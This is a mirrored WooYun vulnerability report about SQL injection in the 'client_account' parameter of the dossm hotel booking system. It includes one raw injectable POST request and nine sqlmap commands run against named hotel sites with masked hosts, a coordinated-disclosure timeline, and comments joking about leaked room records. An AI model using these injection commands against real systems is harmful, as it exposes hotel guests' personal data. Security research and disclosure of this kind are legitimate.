dossm的某处sql注入可导致酒店数据泄露

admin 2015年7月16日15:45:39评论294 views字数 237阅读0分47秒阅读模式
摘要

2014-10-22: 细节已通知厂商并且等待厂商处理中
2014-10-25: 厂商已经确认,细节仅向厂商公开
2014-10-28: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2014-12-19: 细节向核心白帽子及相关领域专家公开
2014-12-29: 细节向普通白帽子公开
2015-01-08: 细节向实习白帽子公开
2015-01-18: 细节向公众公开

漏洞概要 关注数(26) 关注此漏洞

缺陷编号: WooYun-2014-80156

漏洞标题: dossm的某处sql注入可导致酒店数据泄露 dossm的某处sql注入可导致酒店数据泄露

相关厂商: 广州问途信息技术有限公司

漏洞作者: Coodydossm的某处sql注入可导致酒店数据泄露

提交时间: 2014-10-22 18:31

公开时间: 2015-01-18 18:32

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 18

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

5人收藏


漏洞详情

披露状态:

2014-10-22: 细节已通知厂商并且等待厂商处理中
2014-10-25: 厂商已经确认,细节仅向厂商公开
2014-10-28: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-12-19: 细节向核心白帽子及相关领域专家公开
2014-12-29: 细节向普通白帽子公开
2015-01-08: 细节向实习白帽子公开
2015-01-18: 细节向公众公开

简要描述:

RT!

详细说明:

续http://**.**.**.**/bugs/wooyun-2014-077249 后另一种姿势泄露开房信息。

PS:国庆确定没有开房么?表骗我,一查就知道。

-------------------------------

厂商:广州问途信息技术有限公司 http://**.**.**.**/

系统:dossm

框架:PHP + Mysql

问题参数:client_account

说明:该系统,凡是出现参数 client_account 的链接,都存在SQL注入漏洞。无论 GET or POST 类型。

具体案例可参考上一漏洞中的“影响酒店列表”部分。

-------------------------------

漏洞证明:这里举出10个案例,证明其存在SQL注入漏洞。为方便测试,除了案例1之外的都改用GET类型请求。

1# http://**.**.**.**/ 广东华师粤海酒店

code 区域
POST /saas/Guest/getLogin/?jsoncallback=jQuery18006111152800731361_1413790314004 HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 75
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Origin: http://**.**.**.**
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://**.**.**.**/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: dossm-id=2014102015121997406; PHPSESSID=192166fnffjmclj7usec4tmv17; think_language=zh-cn; _gat=1; compareState=Open; Hm_lvt_dd18eab5f23e44b0e822d77c32d67b9e=1411564893,1413789140; Hm_lpvt_dd18eab5f23e44b0e822d77c32d67b9e=1413790324; _ga=GA1.2.1254425558.1411564893

referer=&dossm-id=2014102015121997406&client_account=gz_hsyh*&language=zh-cn

dossm的某处sql注入可导致酒店数据泄露

2# http://**.**.**.** 五指山亚泰雨林度假酒店

code 区域
C:/Users/Administrator>sqlmap.py -u "http://**.**.**.**/saas/Guest/getLogin/?jsoncallback=jQuery191031815274455584586_1413791294237&client_account=wzs_ytyl*&code=&language=zh-cn&referer=&fields=1&_=1413791294238" --dbms=mysql --current-user --current-db

dossm的某处sql注入可导致酒店数据泄露

3# http://**.**.**.**/ 龙源温泉大酒店官方网站

code 区域
C:/Users/Administrator>sqlmap.py -u "http://**.**.**.**/saas/Guest/getLogin/?jsoncallback=jQuery18308396553485654294_1413791525231&client_account=hy_lyhotel*&language=zh-cn&_=1413791528664" --dbms=mysql --current-user --current-db

dossm的某处sql注入可导致酒店数据泄露

4# http://**.**.**.** 三亚亚龙湾高尔夫球会

code 区域
C:/Users/Administrator/Desktop>sqlmap.py -u "http://**.**.**.**/saas/Guest/getLogin/?jsoncallback=jQuery17109495638471562415_1413791869560&client_account=sy_golfclub*&referer=&dossm-id=2014102015575255163&language=zh-cn&_=1413791872350" --dbms=mysql --current-db --current-user

dossm的某处sql注入可导致酒店数据泄露

5# http://**.**.**.** 深圳阳光酒店

code 区域
C:/Users/Administrator>sqlmap.py -u "http://**.**.**.**/saas/Guest/getLogin/?jsoncallback=jQuery18306997522658202797_1413792995726&client_account=hn_xt_group*&language=zh-cn" --dbms=mysql --current-db --current-user

dossm的某处sql注入可导致酒店数据泄露

6# http://**.**.**.** 广州木莲庄酒店官方网站心境遇自然

code 区域
C:/Users/Administrator>sqlmap.py -u "http://**.**.**.**/saas/Guest/getLogin/?jsoncallback=jQuery19107581029343418777_1413793144338&client_account=gz_mlzhotel*&code=&language=zh-cn&referer=&fields=1&_=1413793144339" --dbms=mysql --current-db --current-user

dossm的某处sql注入可导致酒店数据泄露

7# http://**.**.**.**/ 华雅国际大酒店

code 区域
C:/Users/Administrator>sqlmap.py -u "http://**.**.**.**/saas/Guest/getLogin/?jsoncallback=jQuery180009386292030103505_1413793315607&referer=&dossm-id=2014102016215825117&client_account=hn_hy*&language=zh-cn" --dbms=mysql --current-user --current-db

dossm的某处sql注入可导致酒店数据泄露

8# http://**.**.**.** 广州华金盾大酒店 官方网站

code 区域
C:/Users/Administrator>sqlmap.py -u "http://**.**.**.**/saas/Guest/getLogin/?jsoncallback=jQuery18006759995706379414_1413793523835&referer=&dossm-id=2014102016252962149&client_account=gz_hjd*&language=zh-cn" --dbms=mysql --current-db  --current-user

dossm的某处sql注入可导致酒店数据泄露

9# http://**.**.**.** 珠海德翰大酒店_官方网站

code 区域
C:/Users/Administrator>sqlmap.py -u "http://**.**.**.**/saas/Guest/getLogin/?jsoncallback=jQuery17205487245253752917_1413793832228&referer=&dossm-id=2014102016303745069&client_account=zh_dehan*&language=zh-cn"  --dbms=mysql --current-db --current-user

dossm的某处sql注入可导致酒店数据泄露

10# http://**.**.**.** 广州逸林假日酒店官方网站

code 区域
C:/Users/Administrator>sqlmap.py -u "http://**.**.**.**/saas/Guest/getLogin/?jsoncallback=jQuery19108055493170395494_1413794067254&client_account=gz_yljrhotel*&code=&language=zh-cn&referer=&fields=1&_=1413794067255" --dbms=mysql --current-db --current-user

dossm的某处sql注入可导致酒店数据泄露

最后,用户数据很重要,可不能轻易的泄露啊!!!!!

漏洞证明:

同上

修复方案:

版权声明:转载请注明来源 Coody@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-10-25 13:53

厂商回复:

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2014-10-20 20:01 | Power ( 实习白帽子 | Rank:96 漏洞数:31 )

    1

    .....

  2. 2014-10-20 20:11 | Coody dossm的某处sql注入可导致酒店数据泄露 ( 核心白帽子 | Rank:1809 漏洞数:214 | 不接单、不黑产;如遇冒名顶替接单收徒、绝...)

    0

    .....

  3. 2014-10-20 22:47 | 机器猫 ( 普通白帽子 | Rank:1358 漏洞数:291 | 爱生活、爱腾讯、爱网络!一个有梦想的16岁...)

    1

    .....

  4. 2014-10-20 22:59 | 毕月乌 ( 普通白帽子 | Rank:120 漏洞数:16 | 猜猜我是谁?)

    0

    我确定!

  5. 2014-10-21 00:29 | Let a person cry. ( 实习白帽子 | Rank:31 漏洞数:11 | xxoo)

    0

    ........我没开

  6. 2014-10-21 08:38 | 机器猫 ( 普通白帽子 | Rank:1358 漏洞数:291 | 爱生活、爱腾讯、爱网络!一个有梦想的16岁...)

    1

    我带女友开了。额- -。

  7. 2014-10-21 09:27 | 子非海绵宝宝 dossm的某处sql注入可导致酒店数据泄露 ( 核心白帽子 | Rank:1413 漏洞数:148 | 发扬海绵宝宝的精神! 你不是海绵宝宝,你怎...)

    1

    车震了

  8. 2014-10-21 09:56 | hkAssassin ( 普通白帽子 | Rank:395 漏洞数:73 | 我是一只毛毛虫。)

    0

    这个叼……

  9. 2014-10-21 10:35 | 小饼仔 ( 普通白帽子 | Rank:403 漏洞数:50 | zzz)

    0

    洞主昨天提交的漏洞吗?

  10. 2014-10-25 17:03 | laoyao ( 路人 | Rank:14 漏洞数:5 | ด้้้้้็็็็็้้้้้็็็็...)

    0

    过一段时间会有2000W裤子么》。。

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin